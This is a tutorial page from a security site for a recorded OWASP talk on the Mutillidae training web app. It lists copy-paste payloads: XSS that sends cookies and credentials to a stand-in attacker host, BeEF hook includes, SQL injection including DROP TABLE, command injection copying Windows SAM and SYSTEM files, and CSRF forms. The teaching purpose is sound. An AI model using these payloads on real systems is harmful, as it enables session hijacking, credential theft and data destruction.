A Logo

Feel free to include my content in your page via my
RSS feed

Help Irongeek.com pay for
bandwidth and research equipment:

Search Irongeek.com:

Irongeek Button
Social-engineer-training Button

Help Irongeek.com pay for bandwidth and research equipment:


OWASP Top 5 and Mutillidae: Intro to common web vulnerabilities like Cross Site Scripting (XSS), SQL/Command Injection Flaws, Malicious File Execution/RFI, Insecure Direct Object Reference and Cross Site Request Forgery (CSRF/XSRF) (Hacking Illustrated Series InfoSec Tutorial Videos)

OWASP Top 5 and Mutillidae: Intro to common web vulnerabilities like Cross Site Scripting (XSS), SQL/Command Injection Flaws, Malicious File Execution/RFI, Insecure Direct Object Reference and Cross Site Request Forgery (CSRF/XSRF)

    This is a recording of the presentation I gave to the Louisville Chapter of OWASP about the Mutillidae project. A while back I wanted to start covering more web application pen-testing tools and concepts in some of my videos and live classes. Of course, I needed vulnerable web apps to illustrate common web security problems. I like the WebGoat project, but sometimes it's a little hard to figure out exactly what they want you to do to exploit a given web application, and it's written in J2EE (not a layman friendly language). In an attempt to have something simple to use as a demo in my videos and in class, I started the Mutillidae project. This is a video covering the first 5 of the OWASP Top 10.

Slides can be found here


Owasp Louisville 2nd Meeting from Adrian Crenshaw on Vimeo. The AVI can be downloaded from the Vimeo site, but you will need install the Camstudio codec.


XSS code and other stings I injected in the video (provided here for easy copy and pasting):

Simple XSS:

Page Redirect XSS:
<script>window.location = "http://www.irongeek.com/"</script>

Cookie Stealing:
<script> new Image().src="http://attacker.hak/catch.php?cookie="+encodeURI(document.cookie); </script>

Password Con XSS:
username=prompt('Please enter your username',' '); password=prompt('Please enter your password',' '); document.write("<img src=\"http://attacker.hak/catch.php?username="+username+"&password="+password+"\">"); </script>

More complicated, but better looking XSS password form:
style="position: absolute; width: 30%; z-index: 2; left: 35%; top: 40%; float:left; background-color:#C0C0C0" id="loginlayer"> <form method="POST" name="logonf" > <b>You must login to continue</b> <div align="center"> <table border="0" cellspacing="0" cellpadding="0"> <tr> <td>User:</td> <td><input name="userf" size="20"></td> </tr> <tr> <td>Password:</td> <td><input type="password" name="passwordf" size="20"></td> </tr> </table> </div> <p align="center"><input type="button" value="Submit" onClick="submitandhide()"></p> </form> <script> function submitandhide() { document.getElementById("loginlayer").style.display = "none"; temprs = "user=" + document.logonf.userf.value + "&password=" + document.logonf.passwordf.value; var iframe = document.createElement('IFRAME'); iframe.src = ("http://attacker.hak/catch.php?" + temprs); document.body.appendChild(iframe); //help from http://www.gnucitizen.org/blog/javascript-remoting-dangers/ } </script> </div>

Clippy XSS:
<div style="position:fixed; right:60px; bottom:10px; overflow:visible;" id="clippy"> <table valign="top" width="130" height="309" border="0" background="http://www.irongeek.com/images/clippy.png" cellpadding="10"> <tr><td valign="top">Hello, it looks like you have an XSS vulnerability, would you like <a href="http://www.owasp.org/index.php/Cross_site_scripting">some help fixing that?</a></td></tr> </table> </div>

External Javascript:
src="http://ha.ckers.org/xss.js"> </script>

Hot BeEF Injection:
language='Javascript' src='http://localhost/beef/hook/beefmagic.js.php'></script>

User Agent Example:
<useragentswitcher><useragent description="XSS Test" useragent="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0 &lt;script&gt;window.location = &quot;http://www.irongeek.com/&quot;&lt;/script&gt;)" appname="Microsoft Internet Explorer" appversion="4.0 (compatible; MSIE 7.0; Windows NT 6.0)" platform="Win32" vendor="" vendorsub=""/></useragentswitcher>

SQL Injection Strings:
'; DROP TABLE owasp10; --
' or 1=1 --
' + password --

Command Injection Strings:
wmic process list
wmic useraccount list
&& copy c:\WINDOWS\repair\sam && copy c:\WINDOWS\repair\system.bak
copy C:\Windows\System32\config\RegBack\sam.old && copy C:\Windows\System32\config\RegBack\SYSTEM.OLD

File includes:
at source viewer:

CSRF/XSRF Examples:

IMG get:

src="http://target.hak/index.php?page=add-to-your-blog.php&input_from_form=hi%20there%20monkeyboy"" style="width:0px; height:0px; border: 0px"></iframe>

Post method:
<body> <form name="csrfform" method="post" action="http://target.hak/index.php?page=add-to-your-blog.php"> <input type='hidden' name='input_from_form' value="Test of of auto submitted form."> </form> <script> document.csrfform.submit() </script> </body> </html>

Printable version of this article

15 most recent posts on Irongeek.com:

If you would like to republish one of the articles from this site on your webpage or print journal please contact IronGeek.

Copyright 2016, IronGeek
Louisville / Kentuckiana Information Security Enthusiast